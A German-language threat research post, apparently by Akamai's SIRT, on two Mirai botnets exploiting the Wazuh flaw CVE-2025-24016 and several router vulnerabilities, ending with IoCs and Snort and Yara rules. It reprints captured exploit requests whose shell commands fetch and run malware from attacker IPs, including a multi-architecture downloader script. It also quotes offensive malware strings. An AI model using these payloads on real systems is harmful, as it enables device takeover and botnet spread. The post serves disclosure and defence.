Zwei Botnets, ein Fehler: Mirai verbreitet sich durch Wazuh-Schwachstelle
Alle Ergebnisse dieser Studie wurden mithilfe von SIRT-Honeypoots gesammelt und nicht auf tatsächlichen Wazuh-Produktionsendpunkten beobachtet, auf denen die Wazuh-Software ausgeführt wurde.
INHALTSWARNUNG: Einige der Namenskonventionen, die von den Angreifern verwendet werden, die in diesem Artikel erwähnt werden, umfassen rassistische Beleidigungen und explizite Sprache. Aus Informations- und Entdeckungszwecken haben wir sie nicht geschwärzt. Diese spiegeln in keiner Weise die Werte oder Ansichten von Akamai wider.
Zusammenfassung
Das Security Intelligence and Response Team (SIRT) von Akamai hat die aktive Ausnutzung der kritischen RCE-Schwachstelle (Remote Code Execution) CVE-2025-24016 auf Wazuh-Servern (CVSS 9,9) identifiziert.
Die Schwachstelle nutzt dezentrale API-Anfragen (DAPI) aus, sodass ein Angreifer Code per Remote-Zugriff ausführen kann, indem er ein unbereinigtes Wörterbuch hochlädt.
Wir haben zwei Kampagnen mit Mirai-Varianten beobachtet, die diese Schwachstelle ausnutzten. Eine dieser Kampagnen, „Resbot“, hat eine italienische Nomenklatur, die möglicherweise auf die Zielgeografie oder Sprache des betroffenen Geräteeigentümers schließen lässt.
Die Akamai SIRT hat im März 2025 erstmals Aktivitäten in unserem globalen Netzwerk von Honeypots identifiziert. Dies ist die erste gemeldete aktive Ausnutzung dieser Schwachstelle seit der ersten Offenlegung im Februar 2025.
Die Botnets, die diese Schwachstelle ausnutzen, haben verschiedene bekannte Schwachstellen genutzt, darunter CVE-2023-1389, CVE-2017-17215, CVE-2017-18368 und andere.
Wir haben am Ende dieses Blogbeitrags eine Liste von Indikatoren für eine Kompromittierung (Indicators of Compromise, IoCs) zusammengestellt, um diese Bedrohung abzuwehren.
Einführung
Das SIRT von Akamai beobachtete Ende März 2025 aktive Ausnutzungsversuche von CVE-2025-24016 in unserem Cluster von Honeypots, die über das Internet zugänglich sind. Das SIRT identifizierte zwei verschiedene Botnets, die diesen Exploit nutzten, um Varianten der Mirai-Malware auf anfällige Zielsysteme zu verbreiten.
Was ist CVE-2025-24016?
Im Februar 2025 wurde CVE-2025-24016 im Manager-Paket der Open-Source-XDR- und SIEM-Lösung Wazuh offengelegt. Sie betrifft die Wazuh-Versionen 4.4.0 bis 4.9. Die Fehlerbehebung erfolgte in Version 4.9.1. Die Schwachstelle ermöglicht einem Remoteangreifer mit API-Zugriff, beliebigen Code auf dem Zielserver auszuführen, indem er eine schädliche JSON-Datei verwendet.
In der Wazuh-API werden die Parameter in der DistributedAPI als JSON serialisiert und dann mit as_Wazuh_object in der Datei framework/wazuh/core/cluster/common.py deserialisiert. Dies kann ausgenutzt werden, indem ein nicht bereinigtes Wörterbuch in DAPI-Anfragen injiziert wird, was zur Ausführung von beliebigem Python-Code führen kann.
Ende Februar 2025 wurde in einem Proof of Concept (PoC) beschrieben, wie RCE mit dieser Schwachstelle erreicht werden kann. RCE kann mit dem run_as-Endpunkt ausgelöst werden, sodass der Angreifer das auth_context-Argument steuern kann. Im PoC zeigt der Autor dies anhand einer Burp-Suite-Anfrage gegen die URI /security/user/authenticate/run_as (Abbildung 1).
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-
encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
Abb. 1: Burp-Suite-Anfrage (Quelle: https://github.com/MuhammadWaseem29/CVE-2025-24016)
Der Autorisierungsheader ist Base64-codiert, und die schädliche Payload enthält die unbereinigte Ausnahme __unhandled_exc__, die die Ausführung beliebigen Python-Codes auslöst – in diesem Fall exit.
Aktiver Exploit
Nur wenige Wochen nach der Offenlegung entdeckte das Akamai SIRT Anfang März 2025 Versuche, diese Wazuh-Schwachstelle in unserem globalen Netzwerk von Honeypots auszunutzen. Dies ist das neueste Beispiel für die immer knapper werdenden Time-to-Exploit-Zeitpläne, die Botnet-Betreiber für neu veröffentlichte CVEs eingeführt haben.
Die Base64-codierte Headerautorisierung kann zu wazuh-wui:MyS3cr37P450r.*- decodiert werden, was mit der Autorisierung im PoC-Exploit identisch ist (Abbildung 2). Die Endpoint- und Anfragestruktur entspricht dem PoC-Exploit, wird aber hier zur Verbreitung von Malware verwendet.
/security/user/authenticate/run_as {"__unhandled_exc__":{"__args__":["wget http://176.65.134[.]62/w.sh -O /tmp/temp_script.sh || curl -o /tmp/temp_script.sh http://176.65.134[.]62/w.sh; sh /tmp/temp_script.sh"],"__class__":"os.system"}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Abb. 2: Exploit-Versuch Nr. 1 ist identisch mit dem PoC
Darüber hinaus haben wir Anfang Mai 2025 ähnlich strukturierte Anfragen entdeckt, die auf den Endpunkt /Wazuh abzielen, was sich vom Standard-Zielendpunkt für diese Schwachstelle unterscheidet (Abbildung 3). Da die Anfragen fast identisch mit dem PoC sind, versucht das Botnet wahrscheinlich, neben dem Endpunkt noch die gleiche Wazuh-Sicherheitslücke auszunutzen.
/wazuh {"__unhandled_exc__": {"__class__": "os.system", "__args__": ["wget http://104.168.101[.]27/sh -O- | sh"]}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Abb. 3: Exploit-Versuch Nr. 2 unterscheidet sich vom PoC
Botnet 1: Mehrere Mirai-Varianten
Unsere beobachtete aktive Ausnutzung dieser Wazuh-Schwachstelle ist mit zwei separaten Botnets verbunden. Das erste Botnet ist mit den ersten Versuchen Anfang März 2025 verbunden, bei denen der Exploit ein schädliches Shell-Skript abruft und ausführt, das als Downloader für die Haupt-Payload der Mirai-Malware dient (Abbildung 4). Ähnlich wie bei den üblichen Shell-Skripten, die wir häufig bei Mirai sehen, unterstützt es eine Vielzahl verschiedener Architekturen, die hauptsächlich auf IoT-Geräte (Internet of Things) ausgerichtet sind.
"busybox wget http://176.65.134[.]62/bins/morte.arm; chmod 777 morte.arm; ./morte.arm morte.arm",
"busybox wget http://176.65.134[.]62/bins/morte.arm5; chmod 777 morte.arm5; ./morte.arm5 morte.arm5",
"busybox wget http://176.65.134[.]62/bins/morte.arm6; chmod 777 morte.arm6; ./morte.arm6 morte.arm6",
"busybox wget http://176.65.134[.]62/bins/morte.arm7; chmod 777 morte.arm7; ./morte.arm7 morte.arm7",
"busybox wget http://176.65.134[.]62/bins/morte.i686; chmod 777 morte.i686; ./morte.i686 morte.i686",
"busybox wget http://176.65.134[.]62/bins/morte.m68k; chmod 777 morte.m68k; ./morte.m68k morte.m68k",
"busybox wget http://176.65.134[.]62/bins/morte.mips; chmod 777 morte.mips; ./morte.mips morte.mips",
"busybox wget http://176.65.134[.]62/bins/morte.mpsl; chmod 777 morte.mpsl; ./morte.mpsl morte.mpsl",
"busybox wget http://176.65.134[.]62/bins/morte.ppc; chmod 777 morte.ppc; ./morte.ppc morte.ppc",
"busybox wget http://176.65.134[.]62/bins/morte.sh4; chmod 777 morte.sh4; ./morte.sh4 morte.sh4",
"busybox wget http://176.65.134[.]62/bins/morte.spc; chmod 777 morte.spc; ./morte.spc morte.spc",
"busybox wget http://176.65.134[.]62/bins/morte.x86; chmod 777 morte.x86; ./morte.x86 morte.x86",
"busybox wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x64",
"rm $0"
Abb. 4: Inhalt des Shell-Skripts w.sh
Diese Mirai-Malware-Proben, „morte“ genannt, scheinen LZRD-Mirai-Varianten zu sein, die schon seit einiger Zeit verfügbar sind. Sie lassen sich leicht anhand der hartcodierten eindeutigen Zeichenfolge unterscheiden, die bei der Ausführung auf der Konsole eines Zielcomputers ausgedruckt wird: „lzrd here“.
Beobachtete, im Zusammenhang stehende Domains
Bei der Untersuchung der IP-Adresse 176.65.134[.]62 wurde eine Lösung für eine Command-and-Control-Domain (C2) von nuklearcnc.duckdns[.]org entdeckt. Es ist wichtig zu beachten, dass Duck DNS ein dynamischer DNS-Server ist, und nur diese spezielle Subdomain hier schädlich ist.
Diese Domain wurde auch auf 176.65.142.252 aufgelöst, etwa zur gleichen Zeit. Diese IP wurde in eine andere C2-Domain namens cbot.galaxias[.]cc aufgelöst. Mithilfe von VirusTotal konnten wir ein Windows-basiertes RAT finden, das sich als Windows svchost-Prozess tarnt und Beacons zurück an die cbot.galaxias[.]CC-Subdomain für C2 gibt.
Eine weitere Subdomain, neon.galaxias[.]cc, zeigte eine scheinbar standardmäßigere Mirai-Variantenverteilung und -Kommunikation. Eine der auflösenden IP-Adressen, 209.141.34[.]106, wurde auch in zwei weitere C2-Domains aufgelöst: pangacnc[.]com, und jimmyudp-raw[.]xyz.
In der Domain jimmyudp-raw[.]xyz gab es drei verschiedene Mirai-Malware-Proben auf VirusTotal. Die erste, neon, ist eine unbekannte Mirai-Variante, die sich über Port 80 mit 65.222.202[.]53 zur C2-Kommunikation verbindet und den hartcodierten Konsolenstring „fuck u nigga“ enthielt.
Die zweite, k03ldc, scheint eine modifizierte oder aktualisierte Version der V3G4-Mirai-Variante zu sein. Mit dem hartcodierten Konsolenstring 66V3G4-Katana999, verbindet sie sich über Port 36063 an 196.251.86[.]49, um C2-Kommunikation zu ermöglichen.
Zu guter Letzt ist die dritte Probe, KKveTTgaAAsecNNaaaa, die ursprüngliche V3G4-Mirai-Variante. Die Malware verbindet sich über Port 60195 mit 209.141.34[.]106 zur C2-Kommunikation und verwendet bei der Infektion die hartcodierte Zeichenfolge xxSlicxXxxVEGA. Sie erkennt, ob ein Zielgerät bereits durch die V3G4-Variante infiziert ist, und druckt in diesem Fall „We got this shit already“ statt des typischen Drucks.
Die Domain pangacnc[.]com hatte zwei verschiedene Mirai-Malware-Proben auf VirusTotal, eine war die Malware namens KKveTTgaAAsecNNaaaa, die mit der zuvor erwähnten identisch ist. Die andere, vision, ist eine LZRD-Mirai-Variante, die sich über Port 80 mit 65.222.202[.]53 verbindet, genau wie die Probe neon aus der anderen C2-Domain. Dies lässt auf die Möglichkeit schließen, dass die Mirai-Malware neon eine modifizierte Version der LZRD-Variante ist.
Zusätzliche ausgenutzte Schwachstellen
Abgesehen davon, dass das Botnet auf die Wazuh-RCE abzielt, haben wir auch beobachtet, dass es versucht, weitere Schwachstellen auszunutzen. Dazu gehörten mehrere Schwachstellen, deren Ausnutzung wir beobachtet (Abbildung 5, Abbildung 6 und Abbildung 7) und in früheren Blogbeiträgen dokumentiert haben.
/ws/v1/cluster/apps {"application-id": "application_1404198295326_0003", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64; curl -O http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64"}}, "application-
Abb. 5: Hadoop YARN Schwachstelle
/cgi-bin/luci/;stok=/locale?form=country operation=write&country=$(id>cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://176.65.134[.]62/update.sh; curl -O http://176.65.134[.]62/update.sh; chmod 777 update.sh; sh update.sh; tftp 176.65.134[.]62 -c get tupdate.sh; chmod 777 tupdate.sh; sh tupdate.sh; tftp -r tupdate2.sh -g 176.65.134[.]62; chmod 777 tupdate2.sh; sh tupdate2.sh; ftpget -v -u anonymous -p anonymous -P 21 176.65.134[.]62 update1.sh update1.sh; sh update1.sh; rm -rf update.sh tupdate
Abb. 6: TP-Link Archer AX21 Command Injection (siehe https://nvd.nist.gov/vuln/detail/cve-2023-1389)
/manager_dev_ping_t.gch cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.34[.]106/1.sh; curl -O http://209.141.34[.]106/1.sh; chmod 777 1.sh; sh 1.sh; tftp 209.141.34[.]106 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 209.141.34[.]106; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.34[.]106 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3
Abb. 7: ZTE ZXV10 H108L Router-RCE-Exploit (siehe https://github.com/stasinopoulos/ZTExploit/blob/master/ZTExploit_Source/ztexploit.py)
Botnet 2: Resbot/Resentual-Botnet
Das zweite Botnet, das wir identifiziert haben, entdeckten wir bei Ausnutzungsversuchen des /Wazuh-Endpunkts Anfang Mai 2025. Ähnlich wie beim ersten Exploit wird auch hier ein schädliches Shell-Skript abgerufen und ausgeführt, um als Mirai-Downloader zu dienen. Die Malware „ressgod“ wird durch die hartcodierte Konsolenzeichenfolge „Resentual got you!“ identifiziert. Ähnlich wie beim ersten Botnet zielt die Payload auf eine Vielzahl von Architekturen mit IoT-Geräten ab.
Eines der interessanten Dinge, die uns an diesem Botnet aufgefallen sind, war die zugehörige Sprache. Es wurde eine Vielzahl von Domains verwendet, um die Malware zu verbreiten, die alle italienische Nomenklatur hatten. Die Domain gestisciweb.com bedeutet beispielsweise grob übersetzt „Web verwalten“.
Die Domains sehen schädlichen Domainnamen ähnlich, die häufig bei Phishing-Angriffen verwendet werden, weil sie deutlich legitimer erscheinen als ihr C2 resbot.online (was recht eindeutig eine schädliche Domain ist). Die sprachlichen Namenskonventionen könnten auf eine Kampagne hindeuten, die darauf abzielt, Geräte zu identifizieren und zu kontrollieren, die von italienischsprachigen Nutzern im Besonderen betrieben werden.
Die Strings in der Probe scheinen unverschlüsselt zu sein und zeigen eine Vielzahl zusätzlicher Scanfunktionen und Exploits. Die IP-Adresse 104.168.101[.]27 ist in der Malware fest kodiert und wird als C2-Server über TCP-Port 62627 (einer der möglichen C2-Ports) verwendet. Darüber hinaus haben wir festgestellt, dass dieses Botnet versucht, sich über FTP über Port 21 zu verteilen und Telnet-Scans durchzuführen.
Die verschiedenen hartcodierten Exploits sind in Abbildung 8, Abbildung 9, Abbildung 10 und Abbildung 11 dargestellt.
POST /ctrlt/DeviceUpgrade_1 HTT
P/1.1\r\nContent-Length: 440\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthori
zation: Digest username="dslf-config", realm="HuaweiHomeGateway",
nonce="88645ce
fb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1",
response="3612f843a42d
b38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001,
cnonce="248d1a2
560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope
xmlns:s="http://schemas.xmls
oap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encodin
g/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-
org:service:WANPPPConnection:1"
><NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r
/resgod.mips
; /bin/busybox chmod +x /tmp/.kx; /tmp/.kx selfrep.huawei)</NewStatusURL>.
<NewDow
nloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade>.
</s:Body></s:Envelope>\r
\n\r\n\r\n
Abb. 8: Huawei HG532 Router-RCE (siehe https://nvd.nist.gov/vuln/detail/cve-2017-17215)
POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://104.168.101[.]27/resgod.mips; chmod 777 resgod.mips; ./resgod.mips selfrep.realtek</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
Abb. 9: Realtek SDK Miniigd UPnP SOAP RCE (siehe https://www.google.com/url?q=https://nvd.nist.gov/vuln/detail/cve-2014-8361&sa=D&source=docs&ust=1748461205172738&usg=AOvVaw2FtzN61mQxXkxEWnb9gb05)
POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 176\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://104.168.101[.]27/resgod.arm7;chmod+777+resgodarm7;./resgodarm7;rm+-rf+resgod.arm7%3b%23&remoteSubmit=Save\r\n\r\n
Abb. 10: TrueOnline ZyXEL P660HN-T v1 Router-Command-Injection (siehe https://nvd.nist.gov/vuln/detail/cve-2017-18368)
&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=$(echo -e "wget http://104.168.101[.]27/sh" >> /tmp/.res) HTTP/1.0
Abb. 11: Verbreitung über FTP
Fazit
Die Verbreitung von Mirai setzt sich relativ unvermindert fort, da es relativ einfach ist, alten Quellcode umzuschreiben und wiederzuverwenden, um neue Botnets einzurichten oder zu erstellen. Und Botnet-Betreiber können häufig Erfolg haben, wenn sie einfach neu veröffentlichte Exploits nutzen.
Obwohl das CVE-Programm insgesamt ein Vorteil für die Branche ist, kann es manchmal ein zweischneidiges Schwert sein, indem es Schwachstellen aufzeigt, die sonst von Cyberkriminellen übersehen worden wären.
Die Versuche von Forschern, Unternehmen über die Bedeutung von Schwachstellen durch die Erstellung von PoCs zu informieren, verursachen weiterhin Kollateralschäden und zeigen auf, wie wichtig es ist, Patches zu installieren, sobald diese veröffentlicht werden. Botnet-Betreiber behalten einige dieser Sicherheitslücken im Auge – und insbesondere in Fällen, in denen PoCs zur Verfügung gestellt werden, passen sie den PoC-Code schnell an, um ihr Botnet zu verbreiten.
Im Gegensatz zu einigen anderen Sicherheitslücken, über die wir kürzlich berichtet haben und die oft nur stillgelegte Geräte betreffen, betrifft CVE-2025-24016 aktive Wazuh-Server, auf denen veraltete Versionen ausgeführt werden. Es wird dringend empfohlen, auf die neueste Version zu patchen, die eine Fehlerbehebung enthält – in diesem Fall Wazuh Version 4.9.1 oder höher. Wazuh hat Richtlinien zur ordnungsgemäßen Sicherung von Systemen herausgegeben. Wenn diese Richtlinien befolgt werden, sollte diese Kampagne kein Problem darstellen.
Bleiben Sie auf dem Laufenden
Das Akamai SIRT wird Bedrohungen wie diese weiterhin überwachen und melden, sowohl für unsere Kunden als auch für die Sicherheitscommunity insgesamt. Besuchen Sie unsere Forschungs-Homepage und folgen Sie uns in den sozialen Medien, um über das SIRT und andere Veröffentlichung der Akamai Security Intelligence Group informiert zu werden.
IOCs
Wir haben eine Liste von IoCs sowie Snort- und Yara-Regeln zusammengestellt, um Sicherheitsteams zu unterstützen.
Snort-Regeln für Netzwerk-IoCs
Snort-Regeln für C2-IPs (Botnet 1)
alert ip any any -> [209.141.34.106, 176.65.142.137, 65.222.202.53, 196.251.86.49, 176.65.134.62] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000001;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Snort-Regeln für die Erkennung der C2-Domainauflösung (Botnet 1)
alert http any any -> [nuklearcnc.duckdns.org, jimmyudp-raw.xyz, pangacnc.com, neon.galaxias.cc, cbot.galaxias.cc] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000002; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
Snort-Regeln für C2-IPs (Botnet 2)
alert ip any any -> [104.168.101.27, 104.168.101.23, 79.124.40.46, 194.195.90.179] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
Snort-Regeln für die Erkennung der C2-Domainauflösung (Botnet 2)
alert http any any -> [resbot.online, versioneonline.com, web-app-on.com, assicurati-con-linear.online, webdiskwebdisk.webprocediweb.com, continueoraweb.com, ora-0-web.com, adesso-online.com, multi-canale.com, eversioneweb.com, gestisciweb.com] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000004; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
Yara-Regeln für Malware-Proben (Botnet 1)
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$lzrd = "LZRD"
$fucku = "fuck u nigga"
$vega = "xXxSlicexXxxVEGA"
$we_got_this = "We got this shit already"
$katana = "666V3G4-Katana999"
$ip1 = "209.141.34.106"
$ip2 = "176.65.142.137"
$ip3 = "65.222.202.53"
$ip4 = "196.251.86.49"
$ip5 = “176.65.134.62”
$domain1 = "nuklearcnc.duckdns.org"
$domain2 = "jimmyudp-raw.xyz"
$domain3 = "pangacnc.com"
$domain4 = "neon.galaxias.cc"
$domain5 = "cbot.galaxias.cc"
$hash1 = "dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9"
$hash2 = "7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549"
$hash3 = "64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f"
$hash4 = "4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed"
$hash5 = "811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc"
$hash6 = "90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353"
$hash7 = "8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6"
$hash8 = "c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1"
$hash9 = "6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a"
condition:
(
$lzrd or
$fucku or
$vega or
$we_got_this or
$katana or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$ip5 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6 or
$hash7 or
$hash8 or
$hash9
)
}
Yara-Regeln für Malware-Proben (Botnet 2)
rule Mirai_Malware_IOCs_2
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware."
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$resentual = "Resentual got you"
$ip1 = "104.168.101.27"
$ip2 = "104.168.101.23"
$ip3 = "79.124.40.46"
$ip4 = "194.195.90.179"
$domain1 = "resbot.online"
$domain2 = "versioneonline.com"
$domain3 = "web-app-on.com"
$domain4 = "Assicurati-con-linear.online"
$domain5 = "webdiskwebdisk.webprocediweb.com"
$domain6 = "continueoraweb.com"
$domain7 = "ora-0-web.com"
$domain8 = "adesso-online.com"
$domain9 = "multi-canale.com"
$domain10 = "eversioneweb.com"
$domain11 = "gestisciweb.com"
$hash1 = "9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b"
$hash2 = "be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0"
$hash3 = "e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0"
$hash4 = "4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6"
$hash5 = "a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc"
$hash6 = "941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549"
condition:
(
$resentual or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$domain6 or
$domain7 or
$domain8 or
$domain9 or
$domain10 or
$domain11 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6
)
}
Schädliche IPv4-Adressen (Botnet 1)
209.141.34.106
176.65.142.137
65.222.202.53
196.251.86.49
176.65.134.62
Schädliche Domains (Botnet 1)
nuklearcnc.duckdns[.]org
jimmyudp-raw[.]xyz
pangacnc[.]com
neon.galaxias[.]cc
cbot.galaxias[.]cc
Schädliche IPv4-Adressen (Botnet 2)
104.168.101.27
104.168.101.23
79.124.40.46
194.195.90.179
Schädliche Domains (Botnet 2)
resbot[.]online
versioneonline[.]com
web-app-on[.]com
Assicurati-con-linear[.]online
webdiskwebdisk.webprocediweb[.]com
continueoraweb[.]com
ora-0-web[.]com
adesso-online[.]com
multi-canale[.]com
eversioneweb[.]com
gestisciweb[.]com
SHA256-Hashes (Botnet 1)
dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9
7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549
64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f
4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed
811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc
90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353
8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6
c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1
6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a
SHA256-Hashes (Botnet 2)
9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b
be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0
e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0
4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6
a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc
941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549
